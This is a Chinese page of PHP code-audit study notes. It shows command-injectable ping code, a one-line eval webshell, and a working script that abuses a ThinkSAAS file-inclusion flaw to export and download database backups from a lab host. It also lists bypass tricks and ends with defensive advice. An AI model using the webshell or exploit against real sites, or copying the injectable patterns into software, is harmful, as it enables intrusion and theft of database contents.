RCE

RCE函数

eval、preg_replace + /e模式、assertJavascript:evalVbscript: Execute、EvalPython:exec
<?php include($_SERVER['DOCUMENT_ROOT'].'/btslab/header.php'); ?>

  <br/><b>Ping:</b>Please Enter Domain Name or IP Address: <br/><br/>

  <form action="cmd.php" method="get">

  <input type="text" name="host" value=""/>

  <br/><br/><input type="submit" name="Go" value="Go"/>

  </form>

  <br/>

<?php

if(isset($_GET['host']))

{

if(strtoupper(substr(PHP_OS, , )) === 'WIN')

{

$result=shell_exec("ping ".$_GET['host']);

}

else

{

$result=shell_exec("ping -c 4 ".$_GET['host']);

}

echo "<b>Result:</b></br><pre>".$result."</pre>";

}

?>

<?php include($_SERVER['DOCUMENT_ROOT'].'/btslab/footer.php'); ?>
<?php

eval($_REQUEST['code']);

?>

 LFI -》 备份文件下载

<?php

//插件条件入口

defined('IN_TS') or die('Access Denied.');

if(is_file('plugins/'.$app.'/'.$plugin.'/'.$in.'.php')){

    require_once('plugins/'.$app.'/'.$plugin.'/'.$in.'.php');

}else{

    tsNotice('sorry:no plugin!');

}

defined('IN_TS') or die('Access Denied.');

switch($ts){

    case "":

        //输出备份文件

        $arrSqlFile = tsScanDir('data/baksql','file');

        include template('sql');

        break;

    //优化

    case "optimize":

        $arrTables = $db->fetch_all_assoc("SHOW TABLES");

        foreach($arrTables as $key=>$item){

            $db->query("OPTIMIZE TABLE `".$item."` ");

        }

        qiMsg('优化数据库成功!');

        break;

    //备份导出

    case "export":

        require_once 'thinksaas/DbManage.php';

        $bakdb = new DBManage ( $TS_DB['host'].':'.$TS_DB['port'], $TS_DB['user'], $TS_DB['pwd'], $TS_DB['name'], 'utf8' );

        $bakdb->backup ('','data/baksql/');

        qiMsg('数据库备份完毕!');

        break;

?php

date_default_timezone_set('Asia/Hong_Kong');

$url = "http://192.168.116.129/thinksaas/index.php?app=user&ac=plugin&plugin=face&in=my5t3ry/../../../../app/system/action/sql&ts=export";

file_get_contents($url);

$time = date('YmdHis');

for($i = $time; $i <= $time + ; $i++){

    $filename = $i ."_all_v1.sql";

    $url = "http://192.168.116.129/thinksaas/data/baksql/".$filename;

    if (@file_get_contents($url, null, null, -, )){

        echo $url;

    }

}

?>

php绕过MD5 - 科学计数法绕过

php绕过MD5 - 数组全等绕过

PHP版本漏洞

PHP5..x     00截断        例如url输入的文件名1.txt%.jpg经过url转码后会变为1.txt\.jpg

反序列化

常见魔术方法 
__construct()__destruct()__call()__callStatic()__get()__set()__isset()__unset()__sleep()__wakeup()__toString()__invoke()__set_state()__clone(),
__debugInfo() 

逻辑判断 -
CVE-2016-7124(__wakeup()魔术方法绕过)  漏洞影响版本:PHP5 < 5.6.25 | PHP7 < 7.0.1
框架反序列化

Joomla反序列化漏洞

框架漏洞

thinkphp    thinkphp5远程代码执行漏洞

修复 - 》 ThinkPHP .0系列升级到 5.0. ,ThinkPHP .1系列升级到 5.1.

RCE - 防御

防御

. 尽量少用执行命令的函数或者直接禁用

. 参数值尽量使用引号包括

. 在使用动态函数之前,确保使用的函数是指定的函数之一

. 在进入执行命令的函数/方法之前,对参数进行过滤,对敏感字符进行转义

. 能使用脚本解决的工作,不要调用其他程序处理。尽量少用执行命令的函数,并在disable_functions中禁用

. 对于可控点是程序参数的情况下,使用escapeshellcmd函数进行过滤,对于可控点是程序参数值的情况下,使用escapeshellarg函数进行过滤

. 参数的值尽量使用引号包裹,并在拼接前调用addslashes进行转义

而针对由特定第三方组件引发的漏洞,我们要做的就是及时打补丁,修改安装时的默认配置

应用安全 - 代码审计 - PHP的更多相关文章

  1. PHP代码审计中你不知道的牛叉技术点

    一.前言 php代码审计如字面意思,对php源代码进行审查,理解代码的逻辑,发现其中的安全漏洞.如审计代码中是否存在sql注入,则检查代码中sql语句到数据库的传输 和调用过程. 入门php代码审计实 ...

  2. 技术专题-PHP代码审计

    作者:坏蛋链接:https://zhuanlan.zhihu.com/p/24472674来源:知乎著作权归作者所有.商业转载请联系作者获得授权,非商业转载请注明出处. 一.前言 php代码审计如字面 ...

  3. 关于PHP代码审计和漏洞挖掘的一点思考

    这里对PHP的代码审计和漏洞挖掘的思路做一下总结,都是个人观点,有不对的地方请多多指出. PHP的漏洞有很大一部分是来自于程序员本身的经验不足,当然和服务器的配置有关,但那属于系统安全范畴了,我不太懂 ...

  4. Kindeditor 代码审计

    <?php /** * KindEditor PHP * * 本PHP程序是演示程序,建议不要直接在实际项目中使用. * 如果您确定直接使用本程序,使用之前请仔细确认相关安全设置. * */ r ...

  5. 一个CMS案例实战讲解PHP代码审计入门

    前言 php代码审计介绍:顾名思义就是检查php源代码中的缺点和错误信息,分析并找到这些问题引发的安全漏洞. 1.环境搭建: 工欲善其事必先利其器,先介绍代码审计必要的环境搭建 审计环境 window ...

  6. php代码审计基础笔记

    出处: 九零SEC连接:http://forum.90sec.org/forum.php?mod=viewthread&tid=8059 --------------------------- ...

  7. 【PHP代码审计】 那些年我们一起挖掘SQL注入 - 3.全局防护Bypass之Base64Decode

    0x01 背景 现在的WEB程序基本都有对SQL注入的全局过滤,像PHP开启了GPC或者在全局文件common.php上使用addslashes()函数对接收的参数进行过滤,尤其是单引号.同上一篇,我 ...

  8. 【PHP代码审计】 那些年我们一起挖掘SQL注入 - 2.全局防护Bypass之UrlDecode

    0x01 背景 现在的WEB程序基本都有对SQL注入的全局过滤,像PHP开启了GPC或者在全局文件common.php上使用addslashes()函数对接收的参数进行过滤,尤其是单引号.遇到这种情况 ...

  9. PHP代码审计】 那些年我们一起挖掘SQL注入 - 1.什么都没过滤的入门情况

    0x01 背景 首先恭喜Seay法师的力作<代码审计:企业级web代码安全架构>,读了两天后深有感触.想了想自己也做审计有2年了,决定写个PHP代码审计实例教程的系列,希望能够帮助到新人更 ...

  10. 【转】PHP代码审计

    PHP代码审计 目录 1. 概述3 2. 输入验证和输出显示3 2.1 命令注入4 2.2 跨站脚本4 2.3 文件包含5 2.4 代码注入5 2.5 SQL注入6 2.6 XPath注入6 2.7 ...

随机推荐

  1. 搭建jumperserver堡垒机管理万台服务器-1

    搭建jumperserver堡垒机管理万台服务器-1 1  Jumpserver堡垒机概述-部署Jumpserver运行环境 2  安装Coco组件 3  安装Web-Terminal前端-Luna组 ...

  2. Divergent series

    网址:https://en.wikipedia.org/wiki/Divergent_series

  3. moc_XXXX.o:(.data.rel.ro._ZTI12CalculatorUI[_ZTI12CalculatorUI]+0x10): undefined reference to `typeinfo for QWidget' collect2: error: ld returned 1 exit status make: *** [Makefile:144: myCalculator]

    main.cpp:(.text.startup+0x22): undefined reference to `QApplication::QApplication(int&, char**, ...

  4. GUI学习之二十三——QComboBox学习总结

    我们在前面分别介绍了两种输入控件:纯键盘文本输入和步长调节器,下面我们来学习下组合框(下拉选择输入). 一.简介 1.下拉框是一个组合控件(包含一个文本显示控件和一个按钮).它默认显示最小的控件给用户 ...

  5. Linux服务器调优

    Linux内核参数 http://space.itpub.net/17283404/viewspace-694350 net.ipv4.tcp_syncookies = 表示开启SYN Cookies ...

  6. 什么原因?全球许多网络提供商推迟部署IPv6

    全球许多网络提供商推迟部署IPv6,指出升级路由器和交换机的成本以及NAT为扩展IPv4地址所取得的令人印象深刻的成就. 这并没有阻止像澳门CTM这样的互联网服务供应商不要冒险,以此为榜样,并且满足终 ...

  7. 【Heaven Cow与God Bull】题解

    题目 Description __int64 ago,there's a heaven cow called sjy... A god bull named wzc fell in love with ...

  8. 手把手搭建K3cloud插件开发环境

    最近几天在配置K3cloud开发环境,发现不论是产品论坛还是百度出来的结果,都不够满意,很多大咖给提供的环境搭建手册都是那个云山雾罩的PPT 也就是这个open.kingdee.com/K3Cloud ...

  9. PHP入门培训教程 PHP变量的使用

      很多朋友在编写PHP程序的时候有时候对变量总有着不能确定的问题,而且也有很多问题就是因为变量的处理不当所造成的.这里兄弟连PHP培训 小编,就PHP变量系统说一下. PHP的变量分为全局变量与局部 ...

  10. 【PowerOJ1738&网络流24题】最小路径覆盖问题 (最大流)

    题意: 思路: [问题分析] 有向无环图最小路径覆盖,可以转化成二分图最大匹配问题,从而用最大流解决. [建模方法] 构造二分图,把原图每个顶点i拆分成二分图X,Y集合中的两个顶点Xi和Yi.对于原图 ...